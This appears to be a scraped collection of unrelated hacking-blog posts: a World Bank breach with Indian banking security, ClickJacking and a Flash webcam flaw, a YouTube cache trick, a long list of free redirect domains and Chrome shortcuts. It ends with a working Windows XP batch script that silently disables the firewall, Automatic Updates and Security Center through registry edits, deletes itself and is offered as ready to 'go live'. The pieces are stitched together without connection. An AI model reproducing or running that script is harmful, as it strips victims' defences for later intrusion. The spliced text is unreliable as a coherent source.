According to this article from the USA Today, Hackers broke into 18 Servers at the World Bank and had access to and possibly stole sensitive information from at-least 5 of the servers. Indian Banks have been relatively lucky, facing a majority of phishing/scam attacks rather then out-right "Hack" attempts from skilled organized criminals such as these.
Throughout my time as a Security Professional whenever discussing Financial Fraud, Phishing and other attacks faced by Banks & Financial Institutions, I have always been of the opinion that they will soon face much more devastating attacks that will make the current attempts pale in comparison.
Why the pessimistic view? Well its simple.
Attackers have always been "creative" coming up with new and complicated schemes in-order to get access to Credit-Card details and Banking Information. The reason they have the time and ability to do so is: Economics. Bottom-line is that most of these attackers are walking away with fistfuls of money at the expense of Banks and their Customers.
If we consider a typical phishing scam, an attacker would send out a million e-mails (approximation) with a success rate at best of 1% (a very generous number considering that a good percent would be picked up by Anti-Spam, Anti-phishing, Mistargeted Users, Smart Users etc) they will walk away with 10000 working banking details.
Instead if the attacker starts targeting servers belonging to Banks, systems belonging to Bank Employees and more importantly any of the thousands of Indian Shopping web-sites with Exposed Customer Information, SQL Injection vulnerabilities etc they could walk away with 100K - 200K Credit-Card details or Banking Information.
As a matter of fact, last week, a colleague of mine ordered for a product from one of the most popular Indian Shopping Portals. When the product was delivered; the label was a print-out invoice at the bottom of which was the URL: http://shopping-website/ecommerce/admin/vieworders.php. After typing this into the browser we were shown WITHOUT AUTHENTICATION plain-text Credit Card details, Order Information, Banking Details etc.
This for sure is one reason, why I do-not personally carry out Online Banking or Shopping besides for maybe on Amazon.com or my Bank Account with Free Fraud Insurance.
Hackers Compromise the World Bank - Reflections on Indian IT Security
What IS ClickJacking
ClickJacking is a relatively old vulnerabilitiy that has been around since 2003-2004, however it has been recently brought back to life by Robert Hansen and Jeremiah Grossman. ClickJacking is a little bit difficult to explain however try to imagine any button that you see in your browser from the Wire Transfer Button on your Bank, Post Blog button on your blog, Add user button on your web-site etc. ClickJacking gives the attacker to ability to invisibly float these buttons on-top of other innocent looking objects in your browser. So when you try to click on the innocent object, you are actually clicking on the malicious button that is floating on top invisibly.
So while you are simply trying to close the javascript pop-up on your screen, play a flash game or interact with some ajax web-site -- you might really be clicking on the button to wire-transfer money to a russian bank account.
A slightly more technical description would be: A malicious page in domain A may create an IFRAME pointing to an application in domain B, to which the user is currently authenticated with cookies. The top-level page may then cover portions of the IFRAME with other visual elements to seamlessly hide everything but a single UI button in domain B, such as 'delete all items,' 'click to add Bob as a admin,' etc. It may then provide its own, misleading UI that implies that the button serves a different purpose and is a part of site A, inviting the user to click it.
In other words, the hacker would dupe users into visiting a malicious page -- through the usual methods -- but then hide the nasty bits under what appears to be the real-deal content from a legitimate site.
How Serious is ClickJacking?
On its own ClickJacking doesn't sound to be a very serious vulnerability, since user interaction is required. However as I have always said, in the world of vulnerabilities 1+1 does not always equal to 2, and might just equal to 10^2. By this I simply mean, that ClickJacking in combination with other vulnerabilities could become a very serious issue.
Example - ClickJacking can Spy on your Webcam and Microphone
Just as I wrote this blogpost a new use for ClickJacking has been disclosed where it can be used to spy on your Microphone and Webcam. This is based on a new vulnerability discovered in Adobe's Flash Software and published about on Guya.net, Rsnake's Blog and Jerremiah Grossman's Blog.
A particular vulnerability exists in Adobe's Flash Software, which allows the malicious attacker to use ClickJacking to gain access to the user's web-cam and microphone.
The vulnerability works as follows:
1) You visit a web-page with a flash application/game embedded in it.
2) You click on the flash button.
3) Your click is "click-jacked" into allowing the server to access your web-cam and microphone.
Whatis really happening:
1) You visit the web-page, in the back the target application (in this case Adobe's Settings Panel) is loaded and made invisible. The Allow button is made to float invisibly.
2) While you click on the flash button, the invisible Allow button is floating on top of the flash button and actually receives your click.
3) The Flash application now has full permission to access your web-cam, microphone etc and even have it stream to a server where it is recorded for future viewing.
You can see a video of this in action at: Youtube and Vimeo.
Check availability of your Username
Everyone one of us has a username on the sites we are a member of. And the reason why many of us have a unique online codename is just to maintain a single username as a matter of convinence. Isn’t it? Now in this Web 2.0 world, we may sometimes come across a service in which our username is already taken by someone. So today I am sharing a service named UserNameCheck which lets you know the availability of your username across several site.
So use this service to check the availablity of your username and get yourself those which are still available so as to represent yourself uniquely with a single username. Its a very important in branding yourself. Moreover you can use this to find a unique username that doesn’t exist on these services.
Save youtube videos directly from Firefox3 cache
Open the youtube video page in firefox 3. Allow the video to play once.
Now the video is finished playing. Open a new tab in firefox 3. In the location bar (address bar) type
about:cache
and press enter. A new page will load. In the page see the heading
Disk cache device
Under that there is “Cache Directory”. There will be a long address similar to one shown below
C:\Documents and Settings\usrname\Local Settings\Application Data\Mozilla\Firefox\Profiles\abcd123h.default\Cache
Copy the full address (You must copy the cache link address from your computer. The above address is just to show and make you understand). Now open “My Computer”. In the address bar paste the already copied long address.
A folder will open. This folder contains the youtube video file in the form of cache. Note that the video file will be big in size. Now open VLC Media player or any other flv player. Drag and drop the bigger cache file in the media player. The file that plays the video is your video file. Copy and paste it in desktop. Rename the file to yourvideo1.flv (or any other name of your choice with flv extension).
Now you have saved the youtube video right from your firefox 3 cache rather than downloading it again.
You can watch the saved video while offline.
Tested in WinXP, Firefox3
Free Domain Redirections
http://www.freedomain.co.nr/
http://www.dot.co.sr/
http://www.uni.cc/
http://www.cjb.net/
http://www.dot.tk/
http://www.da.ru/
http://www.nic.de.vu/
http://www.joynic.com/
http://www.unonic.com/
http://www.free-url-redirection.com.ru/
http://je.ro/en/
http://www.active.ws/domains/
http://www.smartdots.com/register/?LANG=US
http://POST_ONLY_DIRECT_URLS
http://moo.no
http://www.no-ip.com
www.4-all.org
http://www.pt.vu
http://www.rd5.net/
www.rg3.net
www.vai.la/
www.1br.net/
en.mylivepage.com/
freewebs.com
bravehost.com
dostweb.com
de.vu
us.tt
uk.tt
ca.tt
eu.tt
es.tt
fr.tt
it.tt
se.tt
dk.tt
be.tt
de.tt
at.tt
tk
cx.la
de.gg
de.pn
de.tp
de.be
de.hm
de.nr
de.md
de.tt
de.ms
de.tc
de.tf
ch.tp
ch.pn
ch.gg
at.tp
at.pn
at.md
at.gg
elite.to
warez.by
warez.to
t3.to
hitz.to
redir.to
war3z.to
quality.by
appz.by
stuff.by
upload.by
gfx.by
user.by
crackz.by
dl.am
us.pn
us.mn
us.ms
us.tt
us.tf
us.tc
fr.mn
fr.pn
fr.ms
fr.tt
uk.pn
uk.mn
uk.tt
uk.md
ru.tf
ru.tc
ru.md
pl.tf
pl.tc
es.tc
es.tt
es.md
it.tc
it.mn
it.pn
cn.ms
cn.mn
cn.pn
jp.md
jp.pn
net.tf
net.tc
net.ms
info.ms
biz.md
eu.pn
eu.tp
eu.tf
eu.tc
edu.tf
edu.tc
co.nr
box.ag
all.at
back.to
beam.at
been.at
bite.to
board.to
bounce.to
bowl.to
break.at
browse.to
change.to
chip.ms
connect.to
crash.to
cut.by
direct.at
dive.to
drink.to
drive.to
drop.to
easy.to
everything.at
fade.to
fanclub.ms
firstpage.de
fly.to
flying.to
forward.to
fullspeed.to
fun.ms
gameday.de
germany.ms
get.to
getit.at
hard-ware.de
hello.to
hey.to
hop.to
how.to
hp.ms
jump.to
kiss.to
listen.to
mediasite.de
megapage.de
messages.to
mine.at
more.at
more.by
move.to
musicpage.de
mypage.org
mysite.de
nav.to
notrix.at
notrix.ch
notrix.de
notrix.net
on.to
page.to
pagina.de
played.by
playsite.de
privat.ms
quickly.to
redirect.to
rulestheweb.com
run.to
scroll.to
seite.ms
shortcut.to
skip.to snap.to
soft-ware.de
start.at
stick.by
surf.to
switch.to
talk.to
tip.nu
top.ms
transfer.to
travel.to
turn.to
vacations.to
videopage.de
virtualpage.de
w3.to
walk.to
warp9.to
window.to
yours.at
zap.to
zip.to
meine-erste-homepage.com/subdomain.php
gratisdinge.de/kostenlos/kostenlose-domain.php
kostenlose-domain.de.cx/webspace.shtml
r-ene.de/kostenloses/domain.php
mailde.de
subdomain.tv
http://dx.am
orgfree.com
ueuo.com
altervista.org
funpic.org
host.sk
Google Chrome Tips, Tricks, Hacks and Shortcuts
3. You can open a link in an incognito window by right-clicking the link and selecting Open link in incognito window.
4. Alt + Home loads your Google Chrome home page, with thumbnails of your most visited sites shown in the active tabbed window.
5. Control + T opens a new tab. You can drag tabs around to change their order or drag a tab out of the window into its own window.
6. Control + Shift + T opens your most recently closed tab. Press the key combination again to open the tab closed before that one. Google Chrome remembers the last 10 tabs you’ve closed.
7. Jump to different open tabs using Control + 1, Control + 2, Control + 3, etc. Control + 9 takes you to the last tab.
8. Control + Tab lets you cycle through your open tabs in order.
9. Control + Shift + Tab cycles through your tabs in the opposite order.
10. As with Firefox 3, you can drag a link onto a tab to open it in that tab, or drop it between two tabs to open a new tab in that position.
11. To bookmark a site click the star on the left of the address bar and then select a folder to add it to.
12. Control +B hides the Google Chrome bookmarks bar. Press Control + B to bring it back again.
13. Right-click or hold down the back button and you’ll get a drop-down list of sites to go back through. Show Full History, at the bottom of the list, opens a new tab with your full browser history.
14. Control + H is a faster way to bring up the History page.
15. You can delete history for chosen days by scrolling to the day you want to delete and clicking Delete history for this day on the right-hand side of the window.
16. Control + J brings up your Downloads page.
17. To clear an item from your Downloads page, right-click an entry and select Remove.
18. Press Control + K or Control + E to search from the address bar. Once pressed, you’ll see a ? symbol appear in the address bar and you can simply enter your search query and hit Return.
19. Right-click the top of the browser window and select Task manager to see how much memory different tabs and plug-ins are using. Highlight one and click End process to stop it running.
20. Shift + Escape is a quicker way to bring up the Google Chrome Task manager.
21. To see what plug-ins are installed, type about:plugins into the address window.
22. You can also type the following commands into the Google Chrome address window: about:stats, about:network, about:histograms, about:memory, about:cache, about:dns.
23. Type about:crash to see what a crashed tab looks like.
24. A three-second diversion: type about:internets. (Only works in Windows XP.)
25. Edit any web page - right-click a page and select Inspect element. Now edit the HTML source code and hit Return to view the changes.
26. To make Google Chrome your default browser, click the Tools button (in the right-hand corner of the browser window - a spanner icon). Select Options, click the Basics tab and then click the Make Google Chrome my default browser button.
27. To delete cookies, go to Tools > Options > Under the Hood. Scroll down to the Security section, and click Show cookies. Now you can click Remove all or remove individual cookies.
28. To clear more data such as the Google Chrome browsing history and cache, click the Tools icon and select Clear browsing data…
29. To clear the most visited web sites that appear on your Google Chrome start page, you must clear your browsing history using the method above.
30. Clearing your Google Chrome browser history will also stop matches from previously browsed sites appearing as suggestions in your address bar.
Batch File To Disable Firewall-Windows Xp Sp2
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\firewall.reg" ECHO REGEDIT4
>>"%Temp%.\firewall.reg" ECHO.
>>"%Temp%.\firewall.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%.\firewall.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\firewall.reg" ECHO.
>>"%Temp%.\firewall.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
>>"%Temp%.\firewall.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\firewall.reg" ECHO.
>>"%Temp%.\firewall.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
>>"%Temp%.\firewall.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\firewall.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\firewall.reg"
DEL "%Temp%.\firewall.reg"
DEL %0
Shuts down Windows Firewall, disables Automatic Updates for the next reboot.
And no, Microsoft is not going to fix this. This code will work when it goes live.
